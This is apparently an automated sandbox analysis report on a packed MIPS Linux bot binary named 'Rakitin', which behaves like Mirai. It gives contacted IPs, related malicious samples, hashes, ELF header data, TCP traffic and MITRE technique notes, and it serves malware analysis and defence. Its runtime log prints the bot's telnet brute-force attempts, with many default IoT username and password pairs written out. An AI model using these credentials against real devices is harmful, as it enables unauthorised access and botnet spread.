213.41.59.84	unknown	United Kingdom	8220	COLTCOLTTechnologyServicesGroupLimitedGB	false
62.145.208.27	unknown	Netherlands	33915	TNF-ASNL	false
101.128.206.187	unknown	Japan	2497	IIJInternetInitiativeJapanIncJP	false
62.39.77.44	unknown	France	29322	STREAMWIDE-ASThecompanySTREAMWIDElocatedinParisFranc	false
181.245.56.237	unknown	Colombia	26611	COMCELSACO	false
181.126.96.73	unknown	Paraguay	23201	TelecelSAPY	false
178.241.199.89	unknown	Turkey	16135	TURKCELL-ASTurkcellASTR	false
101.196.10.91	unknown	China	58519	CHINATELECOM-CTCLOUDCloudComputingCorporationCN	false
178.150.123.196	unknown	Ukraine	13188	TRIOLANUA	false
101.97.233.46	unknown	Japan	17941	BIT-ISLEEquinixJpapanEnterpriseKKJP	false
109.158.239.20	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	false
2.17.183.129	unknown	European Union	16625	AKAMAI-ASUS	false
37.222.252.54	unknown	Spain	12430	VODAFONE_ESES	false
181.60.189.160	unknown	Colombia	10620	TelmexColombiaSACO	false
204.67.230.201	unknown	United States	1761	TDIR-CAPNETUS	false
181.26.83.248	unknown	Argentina	22927	TelefonicadeArgentinaAR	false
148.35.90.206	unknown	United States	6400	CompaniaDominicanadeTelefonosSADO	false
101.87.127.238	unknown	China	4812	CHINANET-SH-APChinaTelecomGroupCN	false
170.41.187.216	unknown	United States	26034	ASN-DELTA-OUTUS	false
181.122.188.201	unknown	Paraguay	23201	TelecelSAPY	false
62.10.234.129	unknown	Italy	8612	TISCALI-IT	false
181.43.42.48	unknown	Chile	6471	ENTELCHILESACL	false
62.248.16.18	unknown	Turkey	9121	TTNETTR	false
119.26.236.136	unknown	Japan	9617	ZAQJupiterTelecommunicationsCoLtdJP	false
170.50.81.25	unknown	United States	11406	CIGNA-1US	false
210.182.40.99	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	false
212.240.174.250	unknown	United Kingdom	2529	DEMON-INTERNETNowmaintainedbyCableWirelessWorldwide	false
118.37.22.216	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
178.184.52.178	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
2.175.19.200	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
181.71.150.145	unknown	Colombia	27831	ColombiaMovilCO	false
210.194.84.10	unknown	Japan	9824	JTCL-JP-ASJupiterTelecommunicationCoLtdJP	false
62.14.165.100	unknown	Spain	12479	UNI2-ASES	false
178.214.2.148	unknown	Poland	51390	MTMINFO-ASPL	false
62.14.165.103	unknown	Spain	12479	UNI2-ASES	false
178.126.238.255	unknown	Belarus	6697	BELPAK-ASBELPAKBY	false
62.198.53.86	unknown	Denmark	3308	TELIANET-DENMARKDK	false
79.83.229.112	unknown	France	15557	LDCOMNETFR	false
178.80.227.177	unknown	Saudi Arabia	35819	MOBILY-ASEtihadEtisalatCompanyMobilySA	false
119.228.70.246	unknown	Japan	17511	OPTAGEOPTAGEIncJP	false
122.33.60.159	unknown	Korea Republic of	17858	POWERVIS-AS-KRLGPOWERCOMMKR	false
118.115.53.3	unknown	China	38283	CHINANET-SCIDC-AS-APCHINANETSiChuanTelecomInternetData	false
212.170.182.203	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
79.169.109.106	unknown	Portugal	2860	NOS_COMUNICACOESPT	false
125.145.135.186	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
178.197.159.183	unknown	Switzerland	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
178.31.122.87	unknown	Sweden	2119	TELENOR-NEXTELTelenorNorgeASNO	false
223.9.8.107	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
210.247.141.253	unknown	Australia	7496	WEBCENTRAL-ASWebCentralAU	false
101.169.50.223	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	false
119.116.113.197	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
213.200.224.33	unknown	Switzerland	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
178.126.238.249	unknown	Belarus	6697	BELPAK-ASBELPAKBY	false
178.234.186.75	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
178.179.179.6	unknown	Russian Federation	25159	SONICDUO-ASRU	false
101.182.119.61	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	false
213.90.31.52	unknown	Austria	8437	UTA-ASAT	false
170.80.8.12	unknown	Colombia	22368	TELEBUCARAMANGASAESPCO	false
42.213.107.155	unknown	China	4249	LILLY-ASUS	false
178.135.120.15	unknown	Lebanon	42003	OGERONETOGEROTelecomLB	false
213.90.31.54	unknown	Austria	8437	UTA-ASAT	false
79.114.177.238	unknown	Romania	8708	RCS-RDS73-75DrStaicoviciRO	false
178.103.193.185	unknown	United Kingdom	12576	EELtdGB	false
62.246.7.47	unknown	Germany	12312	ECOTELDE	false
157.62.32.89	unknown	United States	22192	SSHENETUS	false
62.215.172.86	unknown	Kuwait	21050	FAST-TELCOKW	false
62.31.100.67	unknown	United Kingdom	5089	NTLGB	false
181.228.149.57	unknown	Argentina	10481	TelecomArgentinaSAAR	false
89.112.89.222	unknown	Russian Federation	20597	ELTEL-ASRU	false
178.153.204.193	unknown	Qatar	42298	GCC-MPLS-PEERINGGCCMPLSpeeringQA	false
178.105.88.161	unknown	United Kingdom	12576	EELtdGB	false
212.161.92.233	unknown	United Kingdom	8220	COLTCOLTTechnologyServicesGroupLimitedGB	false
213.216.152.83	unknown	United Kingdom	1273	CWVodafoneGroupPLCEU	false
178.42.85.134	unknown	Poland	5617	TPNETPL	false
178.13.237.203	unknown	Germany	3209	VODANETInternationalIP-BackboneofVodafoneDE	false
170.27.162.169	unknown	United States	23410	NET-NASSAU-BOCESUS	false
170.0.2.227	unknown	Brazil	264957	CoopercitrusCooperativadeProdutoresRuraisBR	false
42.158.0.170	unknown	China	23724	CHINANET-IDC-BJ-APIDCChinaTelecommunicationsCorporation	false
101.159.127.18	unknown	China	9394	CTTNETChinaTieTongTelecommunicationsCorporationCN	false
213.110.50.46	unknown	Russian Federation	39860	INTEKS-ASRU	false
178.147.43.6	unknown	Greece	6799	OTENET-GRAthens-GreeceGR	false
181.78.50.118	unknown	Argentina	18747	IFX18747US	false
178.180.8.249	unknown	Poland	12912	TMPL	false
170.45.183.34	unknown	United States	264957	CoopercitrusCooperativadeProdutoresRuraisBR	false
109.119.188.211	unknown	Italy	30722	VODAFONE-IT-ASNIT	false
181.175.43.11	unknown	Ecuador	14522	SatnetEC	false
170.113.24.222	unknown	United States	22347	DORSEY-WHITNEYUS	false
213.85.209.38	unknown	Russian Federation	8615	CNT-ASMoscowRussiaRU	false
101.107.22.224	unknown	China	4847	CNIX-APChinaNetworksInter-ExchangeCN	false

Runtime Messages

Command:	/tmp/HCyigyiCAH
Exit Code:
Exit Code Info:
Killed:	True
Standard Output:	Rakitin selfrep started Rakitin. [watchdog] failed to find a valid watchdog driver; bailing out selfrep started Rakitin. [watchdog] failed to find a valid watchdog driver; bailing out selfrep started Rakitin. [main] We are the only process on this system! [scanner] FD5 Attempting to brute found IP 176.114.61.191 [scanner] FD5 connected. Trying root:7ujMko0vizxv [scanner] FD5 lost connection [scanner] FD5 retrying with different auth combo! [scanner] FD5 connected. Trying root:annie2015 [scanner] FD5 lost connection [scanner] FD5 retrying with different auth combo! [scanner] FD5 connected. Trying root:annie2016 [scanner] FD5 lost connection [scanner] FD5 retrying with different auth combo! [scanner] FD5 connected. Trying root:7ujMko0admin [scanner] FD5 lost connection [scanner] FD5 retrying with different auth combo! [scanner] FD6 Attempting to brute found IP 47.39.141.103 [scanner] FD6 connected. Trying root:GM8182 [scanner] FD5 connected. Trying admin:admin [scanner] FD7 Attempting to brute found IP 66.93.145.63 [scanner] FD7 connected. Trying root:123456 [scanner] FD7 finished telnet negotiation [scanner] FD8 Attempting to brute found IP 89.24.50.179 [scanner] FD8 connected. Trying root:fidel123 [scanner] FD8 connection gracefully closed [scanner] FD8 lost connection [scanner] FD8 retrying with different auth combo! [scanner] FD8 connected. Trying root:annie2014 [scanner] FD8 connection gracefully closed [scanner] FD8 lost connection [scanner] FD8 retrying with different auth combo! [scanner] FD8 connected. Trying root:annie2014 [scanner] FD8 connection gracefully closed [scanner] FD8 lost connection [scanner] FD8 retrying with different auth combo! [scanner] FD8 connected. Trying root:hi3518 [scanner] FD8 connection gracefully closed [scanner] FD8 lost connection [scanner] FD8 retrying with different auth combo! [scanner] FD9 Attempting to brute found IP 185.130.219.162 [scanner] FD5 lost connection [scanner] FD5 retrying with different auth combo! [scanner] FD9 connected. Trying root:fidel123 [scanner] FD8 connected. Trying guest:guest [scanner] FD5 connected. Trying root:Zte521 [scanner] FD8 connection gracefully closed [scanner] FD8 lost connection [scanner] FD8 retrying with different auth combo! [scanner] FD9 connection gracefully closed [scanner] FD9 lost connection [scanner] FD9 retrying with different auth combo! [scanner] FD9 connected. Trying admin:ZmqVfoSIP [scanner] FD8 connected. Trying default:tlJwpbo6 [scanner] FD9 connection gracefully closed [scanner] FD9 lost connection [scanner] FD9 retrying with different auth combo! [scanner] FD8 connection gracefully closed [scanner] FD8 lost connection [scanner] FD8 retrying with different auth combo! [scanner] FD9 connected. Trying root:Zte521 [scanner] FD8 connected. Trying root:7ujMko0admin [scanner] FD9 connection gracefully closed [scanner] FD9 lost connection [scanner] FD9 retrying with different auth combo! [scanner] FD8 connection gracefully closed [scanner] FD8 lost connection [scanner] FD8 retrying with different auth combo! [scanner] FD9 connected. Trying root:jvbzd [scanner] FD8 connected. Trying root:annie2014 [scanner] FD9 connection gracefully closed [scanner] FD9 lost connection [scanner] FD9 retrying with different auth combo! [scanner] FD8 connection gracefully closed [scanner] FD8 lost connection [scanner] FD8 retrying with different auth combo! [scanner] FD9 connected. Trying mg3500:merlin [scanner] FD9 connection gracefully closed [scanner] FD9 lost connection [scanner] FD9 retrying with different auth combo! [scanner] FD8 connected. Trying root:fidel123 [scanner] FD8 connection gracefully closed [scanner] FD8 lost connection [scanner] FD8 retrying with different auth combo! [scanner] FD10 Attempting to brute found IP 206.75.46.147 [scanner] FD9 connected. Trying root:annie2013 [scanner] FD9 connection gracefully closed [scanner] FD9 lost connection [scanner] FD9 retrying with different auth combo! [scanner] FD8 connected. Trying root:annie2016 [scanner] FD10 connected. Trying root:zlxx [scanner] FD9 connected. Trying root:ivdev [scanner] FD8 connection gracefully closed [scanner] FD8 lost connection [scanner] FD9 connection gracefully closed [scanner] FD9 lost connection [scanner] FD8 retrying with different auth combo!
Standard Error:

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
181.92.104.192	t2fi2uDNOm	Get hash	malicious	Browse
181.92.104.192	bPAMfuy9oa	Get hash	malicious	Browse
62.138.220.15	0OxK4NR2wM	Get hash	malicious	Browse
62.39.77.44	sora.arm7	Get hash	malicious	Browse
181.61.167.21	RSDka7Gji5	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PLUSSERVER-ASN1DE	tzdVV2W5et.exe	Get hash	malicious	Browse	151.106.119.144
	bot.x86_64	Get hash	malicious	Browse	31.210.20.158
	qTSinrPpSB	Get hash	malicious	Browse	31.210.20.158
	QO7FskBRHD	Get hash	malicious	Browse	31.210.20.158
	3JTerIMW7o	Get hash	malicious	Browse	31.210.20.158
	J4otkuWQXB	Get hash	malicious	Browse	31.210.20.158
	0OxK4NR2wM	Get hash	malicious	Browse	62.138.220.15
	CXVlBV2Bya.exe	Get hash	malicious	Browse	151.106.119.144
	MBB.exe	Get hash	malicious	Browse	31.210.20.153
	tVStWV6q3E	Get hash	malicious	Browse	213.203.204.10
	Wellis Inquiry.exe	Get hash	malicious	Browse	151.106.117.36
	ClgNlmU3Is.exe	Get hash	malicious	Browse	151.106.119.144
	P.O P#01835.xlsx	Get hash	malicious	Browse	31.210.20.153
	bot.x86_64	Get hash	malicious	Browse	31.210.20.158
	bot.arm7	Get hash	malicious	Browse	31.210.20.158
	cCA0tC5xHG	Get hash	malicious	Browse	195.252.218.198
	RjsD53vPgB.exe	Get hash	malicious	Browse	151.106.97.149
	MKS.exe	Get hash	malicious	Browse	31.210.20.153
	Item Specification.scr.exe	Get hash	malicious	Browse	31.210.20.226
	HAWB.exe	Get hash	malicious	Browse	31.210.20.231
KAZTELECOM-ASKZ	SecuriteInfo.com.Linux.Mirai.1429.15365.3177	Get hash	malicious	Browse	178.91.19.41
	T4xP1S9Fhz	Get hash	malicious	Browse	178.91.19.45
	g22kPe2LIc	Get hash	malicious	Browse	178.91.19.60
	hWT9RJDotD	Get hash	malicious	Browse	37.151.211.145
	buiodawbdawbuiopdw.arm7	Get hash	malicious	Browse	178.91.19.39
	4XWuRHcU7S	Get hash	malicious	Browse	95.56.23.145
	ATc5uxXlTp	Get hash	malicious	Browse	82.200.172.218
	YLUHj9C3id	Get hash	malicious	Browse	95.57.49.124
	whaxbkJxne	Get hash	malicious	Browse	5.251.13.242
	sh1i15951I	Get hash	malicious	Browse	95.57.49.133
	J1Scd1bnC4	Get hash	malicious	Browse	95.56.220.165
	WZ4DVF29Pb	Get hash	malicious	Browse	178.91.19.54
	Ecxh4Ab1RZ	Get hash	malicious	Browse	178.91.19.66
	qF7g4nnHh0	Get hash	malicious	Browse	178.91.19.50
	UnHAnaAW.x86	Get hash	malicious	Browse	95.57.49.139
	VdhQknQq9e	Get hash	malicious	Browse	92.47.16.105
	k7DpEOGU9C	Get hash	malicious	Browse	95.57.233.33
	eUjl39mhBT	Get hash	malicious	Browse	92.46.55.172
	94VG.arm7	Get hash	malicious	Browse	178.88.7.126
	h8RVQktJXr	Get hash	malicious	Browse	37.150.52.21
TelecentroSAAR	SecuriteInfo.com.Linux.Mirai.1429.15365.3177	Get hash	malicious	Browse	181.45.174.179
	hWT9RJDotD	Get hash	malicious	Browse	181.45.174.187
	cosvgegE1S	Get hash	malicious	Browse	181.47.116.57
	hNsTaM2BAu	Get hash	malicious	Browse	186.19.249.171
	UCelJ4imjH	Get hash	malicious	Browse	186.19.150.200
	pandora.arm7	Get hash	malicious	Browse	190.55.185.1
	Ecxh4Ab1RZ	Get hash	malicious	Browse	181.47.141.91
	nzVVA4qMtn	Get hash	malicious	Browse	181.45.1.169
	b3astmode.x86	Get hash	malicious	Browse	186.18.212.243
	b3astmode.arm	Get hash	malicious	Browse	186.19.8.57
	apep.x86	Get hash	malicious	Browse	186.23.244.68
	VdhQknQq9e	Get hash	malicious	Browse	181.47.116.84
	1WL2kQmrNk	Get hash	malicious	Browse	181.45.174.158
	MQzYHhdWg0	Get hash	malicious	Browse	186.19.249.175
	L1ecmEWyAw	Get hash	malicious	Browse	181.45.174.173
	g1lkVsHd4L	Get hash	malicious	Browse	181.45.174.125
	666.arm7	Get hash	malicious	Browse	181.45.174.151
	b3astmode.x86	Get hash	malicious	Browse	190.55.197.71
	notabotnet.x86	Get hash	malicious	Browse	181.45.126.255
	Y1Km1Op9Oj	Get hash	malicious	Browse	181.45.1.148

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	7.910894494672479
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	HCyigyiCAH
File size:	33372
MD5:	37d47c84691e35296d2eee47a3bb19c3
SHA1:	afe47428ba503e1d48d58ca9e63dec079676af01
SHA256:	be3c2bbc9ccb07afdb7d40068a1d4ab3911ba6e81eddc72d3e7251fbc09d5aff
SHA512:	e70f15b07777753e98b289371a3f9c521fac91b4a0f942099f11de09e13be1ccfe654f0b9d30f6a2df397e237539c57f2796fb493a8c3aaf30f31b4053bea86a
SSDEEP:	768:ogc55Pi1VI5eo4BKjhbop5SvQk0jYKfMbMFQeqjYIJgGlzDpbuR1Jo:ogc3kCLQfk0j3faWQek9VJuu
File Content Preview:	.ELF......................m....4.........4. ...(..........................................}x.E}x.E}x................?.._UPX!.d........Z...Z........U.......?.E.h4...@b..) ..]....E....(.Rfp.EPD0@..n..y..Ja...%.....R.J......V..U&...k.1.$.'...D...i8..........

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x106dd8
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	2
Section Header Offset:	0
Section Header Size:	40
Number of Section Headers:	0
Header String Table Index:	0

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Prog Interpreter	Section Mappings
LOAD	0x0	0x100000	0x100000	0x811c	0x811c	4.1854	0x5	R E	0x10000
LOAD	0x7d78	0x457d78	0x457d78	0x0	0x0	0.0000	0x6	RW	0x10000

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2021 07:55:53.672240019 CEST	1869	80	192.168.2.23	181.178.147.0
Oct 27, 2021 07:55:53.672373056 CEST	1869	80	192.168.2.23	181.205.125.52
Oct 27, 2021 07:55:53.672389030 CEST	1869	80	192.168.2.23	181.156.172.2
Oct 27, 2021 07:55:53.672414064 CEST	1869	80	192.168.2.23	181.255.190.113
Oct 27, 2021 07:55:53.672447920 CEST	1869	80	192.168.2.23	181.163.174.61
Oct 27, 2021 07:55:53.672470093 CEST	1869	80	192.168.2.23	181.254.168.183
Oct 27, 2021 07:55:53.672545910 CEST	1869	80	192.168.2.23	181.148.173.172
Oct 27, 2021 07:55:53.672548056 CEST	1869	80	192.168.2.23	181.89.223.188
Oct 27, 2021 07:55:53.672548056 CEST	1869	80	192.168.2.23	181.141.144.41
Oct 27, 2021 07:55:53.672566891 CEST	1869	80	192.168.2.23	181.96.172.0
Oct 27, 2021 07:55:53.672583103 CEST	1869	80	192.168.2.23	181.251.58.0
Oct 27, 2021 07:55:53.672614098 CEST	1869	80	192.168.2.23	181.33.125.171
Oct 27, 2021 07:55:53.672631025 CEST	1869	80	192.168.2.23	181.143.111.171
Oct 27, 2021 07:55:53.672671080 CEST	1869	80	192.168.2.23	181.197.45.65
Oct 27, 2021 07:55:53.672693014 CEST	1869	80	192.168.2.23	181.236.212.125
Oct 27, 2021 07:55:53.672718048 CEST	1869	80	192.168.2.23	181.25.57.187
Oct 27, 2021 07:55:53.672741890 CEST	1869	80	192.168.2.23	181.103.196.92
Oct 27, 2021 07:55:53.672772884 CEST	1869	80	192.168.2.23	181.21.133.4
Oct 27, 2021 07:55:53.672833920 CEST	1869	80	192.168.2.23	181.148.130.152
Oct 27, 2021 07:55:53.672846079 CEST	1869	80	192.168.2.23	181.22.19.236
Oct 27, 2021 07:55:53.672853947 CEST	1869	80	192.168.2.23	181.12.15.136
Oct 27, 2021 07:55:53.672882080 CEST	1869	80	192.168.2.23	181.161.43.147
Oct 27, 2021 07:55:53.674057007 CEST	1869	80	192.168.2.23	181.53.140.87
Oct 27, 2021 07:55:53.674078941 CEST	1869	80	192.168.2.23	181.66.29.144
Oct 27, 2021 07:55:53.674103975 CEST	1869	80	192.168.2.23	181.110.182.151
Oct 27, 2021 07:55:53.674138069 CEST	1869	80	192.168.2.23	181.189.178.42
Oct 27, 2021 07:55:53.674170017 CEST	1869	80	192.168.2.23	181.143.238.153
Oct 27, 2021 07:55:53.674199104 CEST	1869	80	192.168.2.23	181.92.243.77
Oct 27, 2021 07:55:53.674225092 CEST	1869	80	192.168.2.23	181.183.30.87
Oct 27, 2021 07:55:53.674257040 CEST	1869	80	192.168.2.23	181.160.164.243
Oct 27, 2021 07:55:53.674284935 CEST	1869	80	192.168.2.23	181.168.28.199
Oct 27, 2021 07:55:53.674316883 CEST	1869	80	192.168.2.23	181.192.243.15
Oct 27, 2021 07:55:53.674381018 CEST	1869	80	192.168.2.23	181.130.29.138
Oct 27, 2021 07:55:53.674411058 CEST	1869	80	192.168.2.23	181.191.149.250
Oct 27, 2021 07:55:53.674439907 CEST	1869	80	192.168.2.23	181.0.115.52
Oct 27, 2021 07:55:53.674464941 CEST	1869	80	192.168.2.23	181.90.100.173
Oct 27, 2021 07:55:53.674488068 CEST	1869	80	192.168.2.23	181.148.91.131
Oct 27, 2021 07:55:53.674516916 CEST	1869	80	192.168.2.23	181.160.143.15
Oct 27, 2021 07:55:53.674587011 CEST	1869	80	192.168.2.23	181.62.48.89
Oct 27, 2021 07:55:53.674612045 CEST	1869	80	192.168.2.23	181.80.169.52
Oct 27, 2021 07:55:53.674669981 CEST	1869	80	192.168.2.23	181.218.203.87
Oct 27, 2021 07:55:53.674705982 CEST	1869	80	192.168.2.23	181.116.22.207
Oct 27, 2021 07:55:53.674725056 CEST	1869	80	192.168.2.23	181.248.47.247
Oct 27, 2021 07:55:53.674757004 CEST	1869	80	192.168.2.23	181.80.198.14
Oct 27, 2021 07:55:53.674813032 CEST	1869	80	192.168.2.23	181.182.59.161
Oct 27, 2021 07:55:53.674844027 CEST	1869	80	192.168.2.23	181.71.186.183
Oct 27, 2021 07:55:53.674873114 CEST	1869	80	192.168.2.23	181.30.59.60
Oct 27, 2021 07:55:53.674933910 CEST	1869	80	192.168.2.23	181.49.84.234
Oct 27, 2021 07:55:53.674984932 CEST	1869	80	192.168.2.23	181.32.146.106
Oct 27, 2021 07:55:53.675071001 CEST	1869	80	192.168.2.23	181.209.246.30
Oct 27, 2021 07:55:53.675103903 CEST	1869	80	192.168.2.23	181.36.226.174
Oct 27, 2021 07:55:53.675195932 CEST	1869	80	192.168.2.23	181.20.188.97
Oct 27, 2021 07:55:53.675249100 CEST	1869	80	192.168.2.23	181.202.89.122
Oct 27, 2021 07:55:53.675324917 CEST	1869	80	192.168.2.23	181.6.69.231
Oct 27, 2021 07:55:53.675384998 CEST	1869	80	192.168.2.23	181.117.250.159
Oct 27, 2021 07:55:53.675497055 CEST	1869	80	192.168.2.23	181.177.57.146
Oct 27, 2021 07:55:53.675528049 CEST	1869	80	192.168.2.23	181.109.139.135
Oct 27, 2021 07:55:53.675550938 CEST	1869	80	192.168.2.23	181.248.40.177
Oct 27, 2021 07:55:53.675612926 CEST	1869	80	192.168.2.23	181.48.59.32
Oct 27, 2021 07:55:53.675643921 CEST	1869	80	192.168.2.23	181.69.81.49
Oct 27, 2021 07:55:53.675723076 CEST	1869	80	192.168.2.23	181.198.217.15
Oct 27, 2021 07:55:53.676131010 CEST	1869	80	192.168.2.23	181.236.89.232
Oct 27, 2021 07:55:53.676137924 CEST	1869	80	192.168.2.23	181.44.9.56
Oct 27, 2021 07:55:53.676139116 CEST	1869	80	192.168.2.23	181.200.111.70
Oct 27, 2021 07:55:53.676137924 CEST	1869	80	192.168.2.23	181.19.37.238
Oct 27, 2021 07:55:53.676140070 CEST	1869	80	192.168.2.23	181.59.11.54
Oct 27, 2021 07:55:53.676146030 CEST	1869	80	192.168.2.23	181.14.188.123
Oct 27, 2021 07:55:53.676150084 CEST	1869	80	192.168.2.23	181.74.29.206
Oct 27, 2021 07:55:53.676153898 CEST	1869	80	192.168.2.23	181.53.65.51
Oct 27, 2021 07:55:53.676153898 CEST	1869	80	192.168.2.23	181.196.206.224
Oct 27, 2021 07:55:53.676156044 CEST	1869	80	192.168.2.23	181.87.91.34
Oct 27, 2021 07:55:53.676161051 CEST	1869	80	192.168.2.23	181.12.211.164
Oct 27, 2021 07:55:53.676161051 CEST	1869	80	192.168.2.23	181.181.219.97
Oct 27, 2021 07:55:53.676166058 CEST	1869	80	192.168.2.23	181.42.210.178
Oct 27, 2021 07:55:53.676173925 CEST	1869	80	192.168.2.23	181.204.81.104
Oct 27, 2021 07:55:53.676181078 CEST	1869	80	192.168.2.23	181.166.243.129
Oct 27, 2021 07:55:53.676206112 CEST	1869	80	192.168.2.23	181.175.89.252
Oct 27, 2021 07:55:53.676229000 CEST	1869	80	192.168.2.23	181.197.225.248
Oct 27, 2021 07:55:53.676259041 CEST	1869	80	192.168.2.23	181.147.114.150
Oct 27, 2021 07:55:53.676281929 CEST	1869	80	192.168.2.23	181.242.131.117
Oct 27, 2021 07:55:53.677090883 CEST	1869	80	192.168.2.23	181.177.244.213
Oct 27, 2021 07:55:53.679265976 CEST	1869	80	192.168.2.23	181.241.32.193
Oct 27, 2021 07:55:53.679282904 CEST	1869	80	192.168.2.23	181.252.18.155
Oct 27, 2021 07:55:53.679315090 CEST	1869	80	192.168.2.23	181.20.170.59
Oct 27, 2021 07:55:53.679368019 CEST	1869	80	192.168.2.23	181.193.246.49
Oct 27, 2021 07:55:53.679394007 CEST	1869	80	192.168.2.23	181.164.222.169
Oct 27, 2021 07:55:53.679423094 CEST	1869	80	192.168.2.23	181.192.22.107
Oct 27, 2021 07:55:53.679450989 CEST	1869	80	192.168.2.23	181.176.166.50
Oct 27, 2021 07:55:53.679522038 CEST	1869	80	192.168.2.23	181.170.131.93
Oct 27, 2021 07:55:53.679557085 CEST	1869	80	192.168.2.23	181.220.212.2
Oct 27, 2021 07:55:53.679589033 CEST	1869	80	192.168.2.23	181.143.106.185
Oct 27, 2021 07:55:53.679605007 CEST	1869	80	192.168.2.23	181.229.176.186
Oct 27, 2021 07:55:53.679640055 CEST	1869	80	192.168.2.23	181.190.76.85
Oct 27, 2021 07:55:53.679661036 CEST	1869	80	192.168.2.23	181.116.231.92
Oct 27, 2021 07:55:53.679693937 CEST	1869	80	192.168.2.23	181.180.157.96
Oct 27, 2021 07:55:53.679724932 CEST	1869	80	192.168.2.23	181.191.32.65
Oct 27, 2021 07:55:53.679744005 CEST	1869	80	192.168.2.23	181.133.249.17
Oct 27, 2021 07:55:53.679763079 CEST	1869	80	192.168.2.23	181.142.194.114
Oct 27, 2021 07:55:53.679785967 CEST	1869	80	192.168.2.23	181.161.170.93
Oct 27, 2021 07:55:53.679812908 CEST	1869	80	192.168.2.23	181.226.90.247

System Behavior

Analysis Process: HCyigyiCAH PID: 5287 Parent PID: 5119

General

Start time:	07:55:51
Start date:	27/10/2021
Path:	/tmp/HCyigyiCAH
Arguments:	/tmp/HCyigyiCAH
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: HCyigyiCAH PID: 5292 Parent PID: 5287

General

Start time:	07:55:53
Start date:	27/10/2021
Path:	/tmp/HCyigyiCAH
Arguments:	n/a
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: HCyigyiCAH PID: 5293 Parent PID: 5287

General

Start time:	07:55:53
Start date:	27/10/2021
Path:	/tmp/HCyigyiCAH
Arguments:	n/a
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: HCyigyiCAH PID: 5296 Parent PID: 5287

General

Start time:	07:55:53
Start date:	27/10/2021
Path:	/tmp/HCyigyiCAH
Arguments:	n/a
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: HCyigyiCAH PID: 5297 Parent PID: 5287

General

Start time:	07:55:53
Start date:	27/10/2021
Path:	/tmp/HCyigyiCAH
Arguments:	n/a
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Analysis Process: HCyigyiCAH PID: 5299 Parent PID: 5287

General

Start time:	07:55:53
Start date:	27/10/2021
Path:	/tmp/HCyigyiCAH
Arguments:	n/a
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

